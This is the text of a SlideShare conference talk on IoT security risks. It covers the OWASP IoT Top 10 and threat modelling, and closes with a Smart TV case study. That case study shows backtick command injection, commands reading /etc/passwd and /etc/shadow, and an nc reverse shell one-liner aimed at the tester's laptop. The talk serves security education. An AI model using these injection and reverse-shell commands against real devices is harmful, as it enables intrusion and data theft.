SlideShare ist ein Scribd-Unternehmen logo
1 von 53
Downloaden Sie, um offline zu lesen
Cecil Su, Technology Risk Advisory,
BDO Advisory Singapore
IOT – BREAKING BAD
#WHOAMI
§ Mission: To promote cybersecurity at large
§ Moonlighting as an Open Web Application Security Project (OWASP) Evangelist
§ Secretary for the Association of Information Security Professional (AiSP)
§ Advisor for the Singapore Honeynet Project
§ OWASP Global Education Committee (GEC) alumni member
§ Co-authored the OWASP Testing Guides v3.0 and v4.0
§ Co-authored the WASC TC v2.0
§ Volunteer Teacher @Hacking Lab (https://www.hacking-lab.com)
§ Judge for the CSA Cybersecurity Awards 2018/2019 and WorldSkills Competition
(Cybersecurity) 2018/2019
OVERVIEW
• Motivation
• Challenge with IoT
• Security & Privacy Risks with IoT
• OWASP IoT Top 10
• Threat Modelling IoT
• Attacking the IoT Stack
• Sample Case Study
I O T
What is IoT?
“A proposed development of the
Internet in which everyday
objects have network
connectivity, allowing them to
send and receive data.”
WHAT IS IOT?
o Belkin Wemo
o Nespresso Prodigio
o Nest
o Phillips Hue
o Garmin Forerunner
o Fitbit
o Whiting Blood Pressure Monitor
o Meat Thermometers
o Weather Stations
o Ring doorbell
o IP Cameras
o Amazon Dash Buttons
o Amazon Echo (Alexa)
o IP Phones
o Pool Pumps
o Door Locks
o Video Game Consoles
o Alarm Systems
MOTIVATION
• IoT Security spending is rapidly increasing
• IoT introduces an increased number of security threats
• IoT security happens on 4 different layers
• Increasing automation of IoT security tasks
• Cyberespionage groups and petty criminals are the most common IoT
attackers
IOT SECURITY HAPPENS ON 4 DIFFERENT LAYERS
Device, Communications, Cloud & Lifecycle Management
Source: IoT Analytics
IOT IS MORE THAN CONSUMER
Hardware hacking “Junk hacking”
“Stunt hacking”
IOT BEYOND THE HYPE
Sectorial/Municipal IoT
o Smart cities
o Smart grid
Industrial IoT
o Connected factories
o Agriculture
o Logistics
Medical IoT
o Smart hospitals
o Electronic medical records
IOT EXPANDS SECURITY NEEDS
IoT CONNECTIVITY
Converged,
Managed Network
Resilience at
Scale
Security
Application
Enablement
Distributed
Intelligence
Increased Attack Surface
Threat Diversity
Impact and Risk
Remediation
Protocols
Compliance and Regulation
SECURITY AND PRIVACY RISKS WITH IOT
Heavy startup presence in the field creates security risks
o Devices are often crowdfunded or created by new companies
who dedicate their limited resources to functionality over
security
o Recent Hewlett Packard study found that 100% of the home
security IoT devices they studied had significant security
vulnerabilities
No governing body or industry standards for IoT security
o Devices are vulnerable to external threats (hackers,
ransomware, etc.) and internal mishandling/errors by
legitimate custodians of the data
Even people who have not purchased an IoT device may be
contributing data to it unknowingly
o August Smart Locks
o Amazon Echo
DATA PRIVACY RISKS
Business, employee, and client
information could be:
• Destroyed
• Altered
• Stolen and exposed
• Held for ransom
Understand IoT device data
collection policies:
• What information is gathered?
• How long is the data kept?
• What is the data used for
(marketing research, etc.)?
THE POWER OF IOT
• Big data provide analytics
• Business process optimizations
• Multiple concurrent access
WHY IT LOOKS SO BAD
Breakers have a long history and robust tools
o Automated network attack tools
o Exploits for most segments of IoT stack
o Physical access and hardware hacking
Builders are still searching for
o Secure toolkits
o Proven methodologies
o Successful models
Result:
o Builders cobble together components
o Build very fragile full stack solutions
o No visibility into security or attack surface
o Attackers have a field day
IOT SEARCH ENGINES
Tool Link
• Internet of Things Scanner https://iotscanner.bullguard.com/
• Shodan https://www.shodan.io/
• Thingful https://www.thingful.net/
• ZoomEye https://www.zoomeye.org/
MISERABLE TRACK RECORD THUS FAR
Luckily most tests are of consumer IoT
http://www8.hp.com/h20195/V2/GetPDF.aspx/4AA5-4759ENW.pdf
Testing industrial, sectorial, and other IoT is much trickier
Most have heterogeneous brownfield deployments
Testers can’t just pop down to NTUC Fairprice to get access to these deployments
SecuringSmartCities.org has done some testing
If history is a guide though things probably are not good
WHY THE CONCERN ABOUT IOT SECURITY?
OWASP IOT PROJECT
An overall IoT security effort
o Attack surfaces (present)
o Vulnerability lists (working)
o Reference solutions (coming)
Aggregates community resources
Guidance for manufacturers, developers and consumers
IoT specific security principles
IoT framework assessment
OWASP IOT TOP 10 (CIRCA 2014)
Category IoT Security Consideration Recommendations
I1: Insecure Web Interface •Ensure that any web interface coding is written
to prevent the use of weak passwords …
When building a web interface consider implementing
lessons learned from web application security. Employ
a framework that utilizes security …
I2: Insufficient
Authentication/Authorization
•Ensure that applications are written to require
strong passwords where authentication is needed
…
Refer to the OWASP Authentication Cheat Sheet
I3: Insecure Network Services •Ensure applications that use network services
don't respond poorly to buffer overflow, fuzzing
…
Try to utilize tested, proven, networking stacks and
interfaces that handle exceptions gracefully...
I4: Lack of Transport Encryption •Ensure all applications are written to make use
of encrypted communication between devices…
Utilize encrypted protocols wherever possible to
protect all data in transit…
I5: Privacy Concerns •Ensure only the minimal amount of personal
information is collected from consumers …
Data can present unintended privacy concerns when
aggregated…
I6: Insecure Cloud Interface •Ensure all cloud interfaces are reviewed for
security vulnerabilities (e.g. API interfaces and
cloud-based web interfaces) …
Cloud security presents unique security considerations,
as well as countermeasures. Be sure to consult your
cloud provider about options for security mechanisms…
I7: Insecure Mobile Interface •Ensure that any mobile application coding is
written to disallows weak passwords …
Mobile interfaces to IoT ecosystems require targeted
security. Consult the OWASP Mobile …
I8: Insufficient Security
Configurability
•Ensure applications are written to include
password security options (e.g. Enabling 20
character passwords or enabling two-factor
authentication)…
Security can be a value proposition. Design should take
into consideration a sliding scale of security
requirements…
I9: Insecure Software/Firmware •Ensure all applications are written to include
update capability and can be updated quickly …
Many IoT deployments are either brownfield and/or
have an extremely long deployment cycle...
I10: Poor Physical Security •Ensure applications are written to utilize a
minimal number of physical external ports (e.g.
USB ports) on the device…
Plan on having IoT edge devices fall into malicious
hands...
OWASP IOT TOP 10: 2018
Source: https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project
PRINCIPLES OF IOT SECURITY
• Assume a hostile edge
• Test for scale
• Internet of lies
• Exploit autonomy
• Expect isolation
• Protect uniformly
• Encryption is tricky
• System hardening
• Limit what you can
• Lifecycle support
• Data in aggregate is unpredictable
• Plan for the worst
• The long haul
• Attackers target weakness
• Transitive ownership
• N:N Authentication
FRAMEWORK ASSESSMENT
• Based on a prototypical IoT deployment model
• Designed like a checklist or benchmark
ATTACKERS
XYZ Entertainment has a lot of intellectual property that I can sell on the black
market. I’m going to figure out how to break in via the IoT devices used.
• Target identified first
• ONLY THEN is the attack considered
• More effort spent planning and executing
• Usually targeting larger organisations (may not necessarily be true now)
Opportunistic Attack
I know how to compromise an embedded device with a known vulnerability. I’m going to
scan the Internet to find unpatched devices and see whether I can access some valuable
data and inject malicious code to infect visitors with the weaponized device.
• Exploit and vulnerability identified first
• Target doesn't matter, just needs to be vulnerable to exploit
• Low-hanging fruit
• Smaller organisations usually fall victim (may not necessarily be true now)
Targeted Attack
GENERIC SECURITY THREATS TAXONOMY
STATE OF IOT SECURITY
What we often see in IoT implementations
• Security maturity about a decade behind
o Weak/default credentials
o Replay attacks
o Lack of or weak encryption
• Often difficult or impossible to patch
• Very large ecosystem
o Many different connectors, standards, platforms, frameworks, etc.
• Security through obscurity
• Many embedded developer assume their code will operate in a trusted
environment
ATTACKING IOT DEVICES (IOT STACK)
• Device
• User/Management Interfaces
o Mobile Applications
o Web
o Thick Clients
• Hardware Input and Output
• Hardware sensors
• Local/Global Network
• Wireless (BLE, ZigBee, Wifi ,etc.,.)
• Cloud Services/API’s
ATTACKING IOT DEVICES (PORTS)
• UART
• JTAG
• SPI
• I2C
• USB
• Ethernet
• Etc
ATTACKING IOT DEVICES (RESEARCH TARGET)
• Identify hardware components
• Download Firmware
• Download SDK’s
• Public datasheets (alldatasheet.com)
o FCC ID
• Identify Ports (UART, JTAG, etc
• Shodan for target discovery
• Threat modelling
ATTACKING IOT DEVICES (COMMON ATTACK TECH)
• Reverse engineering firmware
o Hidden secrets (Passwords, Certs, API Keys, etc)
o Backdoors, Debug or Administrative features
• Radio Attacks (Sniff, Replay, MiTM)
• Monitor network traffic
• Port scan target/Network attacks
• Direct access to device memory
ATTACKING IOT (SKILLS)
• Web Application Security Testing
• Mobile Application Security Testing
• Wireless Testing
• Network Penetration Testing
• Reverse Engineering
• Electronics
• Strong appetite and aptitude for
learning
• and more…
COMMON VULNERABILITIES & EXPOSURES
FIVE-STEPS WITH THREAT MODELLING
Source: ARM Community, Threat Models & Security Analyses
Assets that may need protection:
• Firmware
• Certificates and device-unique keys
• Log-in credentials (user or admin)
• System configurations (to ensure your IP
cannot be compromised or control taken
away)
• Event logs
• Voice recordings
• Network communication
• Device resources (for example:
microphone array and speakers,
computing power and battery, network
bandwidth, debug interface, storage)
Identify potential adversaries:
• Remote software attacker
• Network attacker
• Malicious insider attacker
• Advanced hardware attacker -
STRIDE THREAT MODEL
Source: ARM Community, Threat Models & Security Analyses
ATTACK SURFACES
Source: ARM Community, Threat Models & Security Analyses
ASSETS VERSUS THREATS
Source: ARM Community, Threat Models & Security Analyses
THE SEVERITY OF AN ATTACK
Source: ARM Community, Threat Models & Security Analyses
SECURITY OBJECTIVES – ADDRESSING THREATS
Source: ARM Community, Threat Models & Security Analyses
DEFINE SECURITY REQUIREMENTS
Source: ARM Community, Threat Models & Security Analyses
CONSOLIDATE INTO A THREAT SUMMARY TABLE
SO WHERE DOES THAT LEAVE US WITH TM?
Take all the assets
Associate threat types with each asset
Voila! List of things we need to worry about
THE VULNERABILITY ON THE SMART TV
• Looking for a way in…
• Try arbitrary command : `sleep 5 `
THE FIELDWORK
• The menu froze for a while.
• Thinking that it might have backtick characters that was injected. Maybe
the TV did not expect them and threw an error which prevented it from
loading.
• Typed in “television `sleep 0`” and tried it again. It loaded instantly.
• Decided to measure the time. It turned out that it always took the television
set three times longer than the input number to become responsive, as
shown below:
o sleep(2) - 6 seconds
o sleep(3) - 9 seconds
o sleep(5) - 15 seconds
RUNNING THE COMMANDS
• Test cases
Command Explanation Chars Succeeded
`which nc && sleep 2` which is a linux command that returns the path to a
program if it exists.
&& sleep 2 would freeze the menu for 3*2 seconds if
the which function found nc on the TV set.
19 Yes
`which ssh && sleep 2` Wanted to see if ssh was installed. 20 No
`which wget && sleep 2` But it had wget 21 Yes
`cat /etc/passwd && sleep 2` Wanted to see if /etc/passwd was readable. It was,
and it would have been a big surprise if it wasn't
26 Yes
`cat /etc/shadow && sleep 2` This one is interesting. When there are root
privileges the /etc/shadow file is readable. I wanted
to test if I am root but the file wasn’t readable.
26 No
`ls /etc/shadow && sleep 2` This is the explanation why the shadow file couldn’t
be opened. It just didn’t exist.
25 No
GETTING SHELL ACCESS
• Plugged the ethernet cable and connected to the laptop
• Ran “ipconfig” to determine the IP of the laptop
GETTING SHELL ACCESS
• A reverse shell would be handy because it would bypass any possible firewall
rules blocking incoming connections.
• But before thinking about how to get one in less than 29 characters it is good
to learn a little bit more about the system.
GETTING SHELL ACCESS
• It was discovered that there is nc installed on the TV set, so the next action
is to pipe the output of certain commands through nc back to the laptop.
• The first command “id” was executed, which would indicate whether or not
root privileges is defaulted on the Smart TV set.
GETTING SHELL ACCESS
• The next thing was to obtain a
directory listing of / with `ls -la /|nc
169.254.56.216 5`
• Still it had no shell to issue proper
commands. All of them were more or
less length restricted and not too
useful.
GETTING SHELL ACCESS
• Since the version of nc that was installed on the TV allowed the -e flag it
was easy to get a reverse shell with: `nc 169.254.213.210 5 -e sh`
• Perfect. There is now a proper shell to work with.
• There were multiple possibilities to mess the TV in a visible way.
GETTING SHELL ACCESS
• With this possibility, the avenues available are such as changing the logo
that’s being shown during the boot up process, or changing the apps icons.
SOME SMART TV VULNERABILITIES
Some recent Smart TV vulnerabilities that were discovered:
• CVE-2018-16595: Stack Buffer Overflow memory corruption vulnerability that
could lead to app crash.
• CVE-2018-16594: Directory Traversal where an attacker can upload an
arbitrary file with a crafted file name (e.g.: ../../) that can then traverse
the whole filesystem.
• CVE-2018-16593: Command Injection vulnerability can run arbitrary
commands on the system, which can result in complete remote code
execution with root privilege.
FINAL THOUGHTS
Privacy in realms of big data is a problem
No real technical solution to this one
Regulation is probably coming
A few organisations (ie., FTC) set to release guidelines next year
Consumers may eschew security but business would not
Security can be a differentiator
IN CONCLUSION
Source: Singapore Cyber Landscape 2018 Report, page 49
https://www.csa.gov.sg/~/media/csa/documents/publications/csasinga
porecyberlandscape2018.pdf
Ref#19: Boddy, Sara and Shattuck, Justin. “The Hunt for IoT: The
Growth and Evolution of Thingbots Ensures Chaos,” F5 Labs – Threat
Analysis Report, 13 March 2018,
https://www.f5.com/labs/articles/threat-intelligence/the-hunt-for-iot-
the-growth-andevolution-of-thingbots-ensures-chaos
THANK YOU
CECIL SU, DIRECTOR OF TECHNOLOGY RISK ADVISORY
CYBERSECURITY & DIGITAL FORENSICS INCIDENT RESPONSE
BDO ADVISORY (SINGAPORE)
TEL : +65 6828 9118
DID : +65 6829 9628
EMAIL : CECILSU@BDO.COM.SG

Weitere ähnliche Inhalte

Was ist angesagt?

Practical IoT Security in the Enterprise
Practical IoT Security in the EnterprisePractical IoT Security in the Enterprise
Practical IoT Security in the EnterpriseDaniel Miessler
 
KazHackStan Doing The IoT Penetration Testing - Yogesh Ojha
KazHackStan Doing The IoT Penetration Testing - Yogesh OjhaKazHackStan Doing The IoT Penetration Testing - Yogesh Ojha
KazHackStan Doing The IoT Penetration Testing - Yogesh OjhaYogesh Ojha
 
Ryan Wilson - ryanwilson.com - IoT Security
Ryan Wilson - ryanwilson.com -  IoT SecurityRyan Wilson - ryanwilson.com -  IoT Security
Ryan Wilson - ryanwilson.com - IoT SecurityRyan Wilson
 
Security challenges for IoT
Security challenges for IoTSecurity challenges for IoT
Security challenges for IoTWSO2
 
Iot Security, Internet of Things
Iot Security, Internet of ThingsIot Security, Internet of Things
Iot Security, Internet of ThingsBryan Len
 
IoT Device Hacking and New Direction of IoT Security Evaluation Using Common ...
IoT Device Hacking and New Direction of IoT Security Evaluation Using Common ...IoT Device Hacking and New Direction of IoT Security Evaluation Using Common ...
IoT Device Hacking and New Direction of IoT Security Evaluation Using Common ...Seungjoo Kim
 
Mark Horowitz - Stanford Engineering - Securing the Internet of Things
Mark Horowitz - Stanford Engineering - Securing the Internet of ThingsMark Horowitz - Stanford Engineering - Securing the Internet of Things
Mark Horowitz - Stanford Engineering - Securing the Internet of ThingsStanford School of Engineering
 
IoT Security and Privacy Considerations
IoT Security and Privacy ConsiderationsIoT Security and Privacy Considerations
IoT Security and Privacy ConsiderationsKenny Huang Ph.D.
 
Securing Internet of Things
Securing Internet of ThingsSecuring Internet of Things
Securing Internet of ThingsRishabh Sharma
 
IoT Security: Problems, Challenges and Solutions
IoT Security: Problems, Challenges and SolutionsIoT Security: Problems, Challenges and Solutions
IoT Security: Problems, Challenges and SolutionsLiwei Ren任力偉
 
The Future of Embedded and IoT Security: Kaspersky Operating System
The Future of Embedded and IoT Security: Kaspersky Operating SystemThe Future of Embedded and IoT Security: Kaspersky Operating System
The Future of Embedded and IoT Security: Kaspersky Operating SystemKaspersky Lab
 
Internet of Things Security
Internet of Things SecurityInternet of Things Security
Internet of Things SecurityTutun Juhana
 
Security Fundamental for IoT Devices; Creating the Internet of Secure Things
Security Fundamental for IoT Devices; Creating the Internet of Secure ThingsSecurity Fundamental for IoT Devices; Creating the Internet of Secure Things
Security Fundamental for IoT Devices; Creating the Internet of Secure ThingsDesign World
 
Privacy and security in IoT
Privacy and security in IoTPrivacy and security in IoT
Privacy and security in IoTVasco Veloso
 
Security Aspects in IoT - A Review
Security Aspects in IoT - A Review Security Aspects in IoT - A Review
Security Aspects in IoT - A Review Asiri Hewage
 

Was ist angesagt? (20)

Iot(security)
Iot(security)Iot(security)
Iot(security)
 
Practical IoT Security in the Enterprise
Practical IoT Security in the EnterprisePractical IoT Security in the Enterprise
Practical IoT Security in the Enterprise
 
KazHackStan Doing The IoT Penetration Testing - Yogesh Ojha
KazHackStan Doing The IoT Penetration Testing - Yogesh OjhaKazHackStan Doing The IoT Penetration Testing - Yogesh Ojha
KazHackStan Doing The IoT Penetration Testing - Yogesh Ojha
 
Ryan Wilson - ryanwilson.com - IoT Security
Ryan Wilson - ryanwilson.com -  IoT SecurityRyan Wilson - ryanwilson.com -  IoT Security
Ryan Wilson - ryanwilson.com - IoT Security
 
Security challenges for IoT
Security challenges for IoTSecurity challenges for IoT
Security challenges for IoT
 
IoT Security: Cases and Methods [CON5446]
IoT Security: Cases and Methods [CON5446]IoT Security: Cases and Methods [CON5446]
IoT Security: Cases and Methods [CON5446]
 
Iot Security, Internet of Things
Iot Security, Internet of ThingsIot Security, Internet of Things
Iot Security, Internet of Things
 
IOT Security
IOT SecurityIOT Security
IOT Security
 
IoT Device Hacking and New Direction of IoT Security Evaluation Using Common ...
IoT Device Hacking and New Direction of IoT Security Evaluation Using Common ...IoT Device Hacking and New Direction of IoT Security Evaluation Using Common ...
IoT Device Hacking and New Direction of IoT Security Evaluation Using Common ...
 
Mark Horowitz - Stanford Engineering - Securing the Internet of Things
Mark Horowitz - Stanford Engineering - Securing the Internet of ThingsMark Horowitz - Stanford Engineering - Securing the Internet of Things
Mark Horowitz - Stanford Engineering - Securing the Internet of Things
 
IoT Security and Privacy Considerations
IoT Security and Privacy ConsiderationsIoT Security and Privacy Considerations
IoT Security and Privacy Considerations
 
Iot Security
Iot SecurityIot Security
Iot Security
 
Securing Internet of Things
Securing Internet of ThingsSecuring Internet of Things
Securing Internet of Things
 
IoT Security: Problems, Challenges and Solutions
IoT Security: Problems, Challenges and SolutionsIoT Security: Problems, Challenges and Solutions
IoT Security: Problems, Challenges and Solutions
 
The Future of Embedded and IoT Security: Kaspersky Operating System
The Future of Embedded and IoT Security: Kaspersky Operating SystemThe Future of Embedded and IoT Security: Kaspersky Operating System
The Future of Embedded and IoT Security: Kaspersky Operating System
 
Internet of Things Security
Internet of Things SecurityInternet of Things Security
Internet of Things Security
 
IoT Security, Mirai Revisited
IoT Security, Mirai RevisitedIoT Security, Mirai Revisited
IoT Security, Mirai Revisited
 
Security Fundamental for IoT Devices; Creating the Internet of Secure Things
Security Fundamental for IoT Devices; Creating the Internet of Secure ThingsSecurity Fundamental for IoT Devices; Creating the Internet of Secure Things
Security Fundamental for IoT Devices; Creating the Internet of Secure Things
 
Privacy and security in IoT
Privacy and security in IoTPrivacy and security in IoT
Privacy and security in IoT
 
Security Aspects in IoT - A Review
Security Aspects in IoT - A Review Security Aspects in IoT - A Review
Security Aspects in IoT - A Review
 

Ähnlich wie Breaking Down IoT Security Risks

Security Testing for IoT Systems
Security Testing for IoT SystemsSecurity Testing for IoT Systems
Security Testing for IoT SystemsSecurity Innovation
 
Fundamental Best Practices in Secure IoT Product Development
Fundamental Best Practices in Secure IoT Product DevelopmentFundamental Best Practices in Secure IoT Product Development
Fundamental Best Practices in Secure IoT Product DevelopmentMark Szewczul, CISSP
 
Protecting Our Cyber-Identity in a Physical and Virtual World for IoT Ecosystem
Protecting Our Cyber-Identity in a Physical and Virtual World for IoT EcosystemProtecting Our Cyber-Identity in a Physical and Virtual World for IoT Ecosystem
Protecting Our Cyber-Identity in a Physical and Virtual World for IoT EcosystemCA Technologies
 
[Webinar] Why Security Certification is Crucial for IoT Success
[Webinar] Why Security Certification is Crucial for IoT Success[Webinar] Why Security Certification is Crucial for IoT Success
[Webinar] Why Security Certification is Crucial for IoT SuccessElectric Imp
 
IIoT Endpoint Security – The Model in Practice
IIoT Endpoint Security – The Model in PracticeIIoT Endpoint Security – The Model in Practice
IIoT Endpoint Security – The Model in Practiceteam-WIBU
 
RSA2015: Securing the Internet of Things
RSA2015: Securing the Internet of ThingsRSA2015: Securing the Internet of Things
RSA2015: Securing the Internet of ThingsDaniel Miessler
 
Security Requirements in IoT Architecture
Security	Requirements	in	IoT	Architecture Security	Requirements	in	IoT	Architecture
Security Requirements in IoT Architecture Vrince Vimal
 
Iot security amar prusty
Iot security amar prustyIot security amar prusty
Iot security amar prustyamarprusty
 
WHITE PAPER▶ Insecurity in the Internet of Things
WHITE PAPER▶ Insecurity in the Internet of ThingsWHITE PAPER▶ Insecurity in the Internet of Things
WHITE PAPER▶ Insecurity in the Internet of ThingsSymantec
 
Iot Security and Privacy at Scale
Iot Security and Privacy at ScaleIot Security and Privacy at Scale
Iot Security and Privacy at ScaleWinston Morton
 
Internet of Things... Let's Not Forget Security Please!, by Eric Vyncke [APNI...
Internet of Things... Let's Not Forget Security Please!, by Eric Vyncke [APNI...Internet of Things... Let's Not Forget Security Please!, by Eric Vyncke [APNI...
Internet of Things... Let's Not Forget Security Please!, by Eric Vyncke [APNI...APNIC
 
Internet of Things... Let's Not Forget Security Please, by Eric Vyncke [APNI...
Internet of Things... Let's Not Forget Security Please, by Eric Vyncke [APNI...Internet of Things... Let's Not Forget Security Please, by Eric Vyncke [APNI...
Internet of Things... Let's Not Forget Security Please, by Eric Vyncke [APNI...APNIC
 
Security and Privacy Big Challenges in Internet of things
Security and Privacy Big Challenges in Internet of thingsSecurity and Privacy Big Challenges in Internet of things
Security and Privacy Big Challenges in Internet of thingsIRJET Journal
 
Principals of IoT security
Principals of IoT securityPrincipals of IoT security
Principals of IoT securityIoT613
 
IoT Vulnerability Analysis and IOT In security Controls
IoT Vulnerability Analysis and IOT In security ControlsIoT Vulnerability Analysis and IOT In security Controls
IoT Vulnerability Analysis and IOT In security ControlsJay Nagar
 
#OSSPARIS19 : The evolving (IoT) security landscape - Gianluca Varisco, Arduino
#OSSPARIS19 : The evolving (IoT) security landscape - Gianluca Varisco, Arduino#OSSPARIS19 : The evolving (IoT) security landscape - Gianluca Varisco, Arduino
#OSSPARIS19 : The evolving (IoT) security landscape - Gianluca Varisco, ArduinoParis Open Source Summit
 

Ähnlich wie Breaking Down IoT Security Risks (20)

IoT security
IoT securityIoT security
IoT security
 
Security Testing for IoT Systems
Security Testing for IoT SystemsSecurity Testing for IoT Systems
Security Testing for IoT Systems
 
Fundamental Best Practices in Secure IoT Product Development
Fundamental Best Practices in Secure IoT Product DevelopmentFundamental Best Practices in Secure IoT Product Development
Fundamental Best Practices in Secure IoT Product Development
 
Protecting Our Cyber-Identity in a Physical and Virtual World for IoT Ecosystem
Protecting Our Cyber-Identity in a Physical and Virtual World for IoT EcosystemProtecting Our Cyber-Identity in a Physical and Virtual World for IoT Ecosystem
Protecting Our Cyber-Identity in a Physical and Virtual World for IoT Ecosystem
 
[Webinar] Why Security Certification is Crucial for IoT Success
[Webinar] Why Security Certification is Crucial for IoT Success[Webinar] Why Security Certification is Crucial for IoT Success
[Webinar] Why Security Certification is Crucial for IoT Success
 
IIoT Endpoint Security
IIoT Endpoint Security IIoT Endpoint Security
IIoT Endpoint Security
 
Emerging Trends in Cybersecurity by Amar Prusty
Emerging Trends in Cybersecurity by Amar PrustyEmerging Trends in Cybersecurity by Amar Prusty
Emerging Trends in Cybersecurity by Amar Prusty
 
IIoT Endpoint Security – The Model in Practice
IIoT Endpoint Security – The Model in PracticeIIoT Endpoint Security – The Model in Practice
IIoT Endpoint Security – The Model in Practice
 
RSA2015: Securing the Internet of Things
RSA2015: Securing the Internet of ThingsRSA2015: Securing the Internet of Things
RSA2015: Securing the Internet of Things
 
Security Requirements in IoT Architecture
Security	Requirements	in	IoT	Architecture Security	Requirements	in	IoT	Architecture
Security Requirements in IoT Architecture
 
Iot security amar prusty
Iot security amar prustyIot security amar prusty
Iot security amar prusty
 
WHITE PAPER▶ Insecurity in the Internet of Things
WHITE PAPER▶ Insecurity in the Internet of ThingsWHITE PAPER▶ Insecurity in the Internet of Things
WHITE PAPER▶ Insecurity in the Internet of Things
 
Iot Security and Privacy at Scale
Iot Security and Privacy at ScaleIot Security and Privacy at Scale
Iot Security and Privacy at Scale
 
Internet of Things... Let's Not Forget Security Please!, by Eric Vyncke [APNI...
Internet of Things... Let's Not Forget Security Please!, by Eric Vyncke [APNI...Internet of Things... Let's Not Forget Security Please!, by Eric Vyncke [APNI...
Internet of Things... Let's Not Forget Security Please!, by Eric Vyncke [APNI...
 
Internet of Things... Let's Not Forget Security Please, by Eric Vyncke [APNI...
Internet of Things... Let's Not Forget Security Please, by Eric Vyncke [APNI...Internet of Things... Let's Not Forget Security Please, by Eric Vyncke [APNI...
Internet of Things... Let's Not Forget Security Please, by Eric Vyncke [APNI...
 
Security and Privacy Big Challenges in Internet of things
Security and Privacy Big Challenges in Internet of thingsSecurity and Privacy Big Challenges in Internet of things
Security and Privacy Big Challenges in Internet of things
 
IoT Security
IoT SecurityIoT Security
IoT Security
 
Principals of IoT security
Principals of IoT securityPrincipals of IoT security
Principals of IoT security
 
IoT Vulnerability Analysis and IOT In security Controls
IoT Vulnerability Analysis and IOT In security ControlsIoT Vulnerability Analysis and IOT In security Controls
IoT Vulnerability Analysis and IOT In security Controls
 
#OSSPARIS19 : The evolving (IoT) security landscape - Gianluca Varisco, Arduino
#OSSPARIS19 : The evolving (IoT) security landscape - Gianluca Varisco, Arduino#OSSPARIS19 : The evolving (IoT) security landscape - Gianluca Varisco, Arduino
#OSSPARIS19 : The evolving (IoT) security landscape - Gianluca Varisco, Arduino
 

Mehr von NUS-ISS

Designing Impactful Services and User Experience - Lim Wee Khee
Designing Impactful Services and User Experience - Lim Wee KheeDesigning Impactful Services and User Experience - Lim Wee Khee
Designing Impactful Services and User Experience - Lim Wee KheeNUS-ISS
 
Upskilling the Evolving Workforce with Digital Fluency for Tomorrow's Challen...
Upskilling the Evolving Workforce with Digital Fluency for Tomorrow's Challen...Upskilling the Evolving Workforce with Digital Fluency for Tomorrow's Challen...
Upskilling the Evolving Workforce with Digital Fluency for Tomorrow's Challen...NUS-ISS
 
How the World's Leading Independent Automotive Distributor is Reinventing Its...
How the World's Leading Independent Automotive Distributor is Reinventing Its...How the World's Leading Independent Automotive Distributor is Reinventing Its...
How the World's Leading Independent Automotive Distributor is Reinventing Its...NUS-ISS
 
The Importance of Cybersecurity for Digital Transformation
The Importance of Cybersecurity for Digital TransformationThe Importance of Cybersecurity for Digital Transformation
The Importance of Cybersecurity for Digital TransformationNUS-ISS
 
Architecting CX Measurement Frameworks and Ensuring CX Metrics are fit for Pu...
Architecting CX Measurement Frameworks and Ensuring CX Metrics are fit for Pu...Architecting CX Measurement Frameworks and Ensuring CX Metrics are fit for Pu...
Architecting CX Measurement Frameworks and Ensuring CX Metrics are fit for Pu...NUS-ISS
 
Understanding GenAI/LLM and What is Google Offering - Felix Goh
Understanding GenAI/LLM and What is Google Offering - Felix GohUnderstanding GenAI/LLM and What is Google Offering - Felix Goh
Understanding GenAI/LLM and What is Google Offering - Felix GohNUS-ISS
 
Digital Product-Centric Enterprise and Enterprise Architecture - Tan Eng Tsze
Digital Product-Centric Enterprise and Enterprise Architecture - Tan Eng TszeDigital Product-Centric Enterprise and Enterprise Architecture - Tan Eng Tsze
Digital Product-Centric Enterprise and Enterprise Architecture - Tan Eng TszeNUS-ISS
 
Emerging & Future Technology - How to Prepare for the Next 10 Years of Radica...
Emerging & Future Technology - How to Prepare for the Next 10 Years of Radica...Emerging & Future Technology - How to Prepare for the Next 10 Years of Radica...
Emerging & Future Technology - How to Prepare for the Next 10 Years of Radica...NUS-ISS
 
Beyond the Hype: What Generative AI Means for the Future of Work - Damien Cum...
Beyond the Hype: What Generative AI Means for the Future of Work - Damien Cum...Beyond the Hype: What Generative AI Means for the Future of Work - Damien Cum...
Beyond the Hype: What Generative AI Means for the Future of Work - Damien Cum...NUS-ISS
 
Supply Chain Security for Containerised Workloads - Lee Chuk Munn
Supply Chain Security for Containerised Workloads - Lee Chuk MunnSupply Chain Security for Containerised Workloads - Lee Chuk Munn
Supply Chain Security for Containerised Workloads - Lee Chuk MunnNUS-ISS
 
Future of Learning - Yap Aye Wee.pdf
Future of Learning - Yap Aye Wee.pdfFuture of Learning - Yap Aye Wee.pdf
Future of Learning - Yap Aye Wee.pdfNUS-ISS
 
Future of Learning - Khoong Chan Meng
Future of Learning - Khoong Chan MengFuture of Learning - Khoong Chan Meng
Future of Learning - Khoong Chan MengNUS-ISS
 
Site Reliability Engineer (SRE), We Keep The Lights On 24/7
Site Reliability Engineer (SRE), We Keep The Lights On 24/7Site Reliability Engineer (SRE), We Keep The Lights On 24/7
Site Reliability Engineer (SRE), We Keep The Lights On 24/7NUS-ISS
 
Product Management in The Trenches for a Cloud Service
Product Management in The Trenches for a Cloud ServiceProduct Management in The Trenches for a Cloud Service
Product Management in The Trenches for a Cloud ServiceNUS-ISS
 
Overview of Data and Analytics Essentials and Foundations
Overview of Data and Analytics Essentials and FoundationsOverview of Data and Analytics Essentials and Foundations
Overview of Data and Analytics Essentials and FoundationsNUS-ISS
 
Predictive Analytics
Predictive AnalyticsPredictive Analytics
Predictive AnalyticsNUS-ISS
 
Feature Engineering for IoT
Feature Engineering for IoTFeature Engineering for IoT
Feature Engineering for IoTNUS-ISS
 
Master of Technology in Software Engineering
Master of Technology in Software EngineeringMaster of Technology in Software Engineering
Master of Technology in Software EngineeringNUS-ISS
 
Master of Technology in Enterprise Business Analytics
Master of Technology in Enterprise Business AnalyticsMaster of Technology in Enterprise Business Analytics
Master of Technology in Enterprise Business AnalyticsNUS-ISS
 
Diagnosing Complex Problems Using System Archetypes
Diagnosing Complex Problems Using System ArchetypesDiagnosing Complex Problems Using System Archetypes
Diagnosing Complex Problems Using System ArchetypesNUS-ISS
 

Mehr von NUS-ISS (20)

Designing Impactful Services and User Experience - Lim Wee Khee
Designing Impactful Services and User Experience - Lim Wee KheeDesigning Impactful Services and User Experience - Lim Wee Khee
Designing Impactful Services and User Experience - Lim Wee Khee
 
Upskilling the Evolving Workforce with Digital Fluency for Tomorrow's Challen...
Upskilling the Evolving Workforce with Digital Fluency for Tomorrow's Challen...Upskilling the Evolving Workforce with Digital Fluency for Tomorrow's Challen...
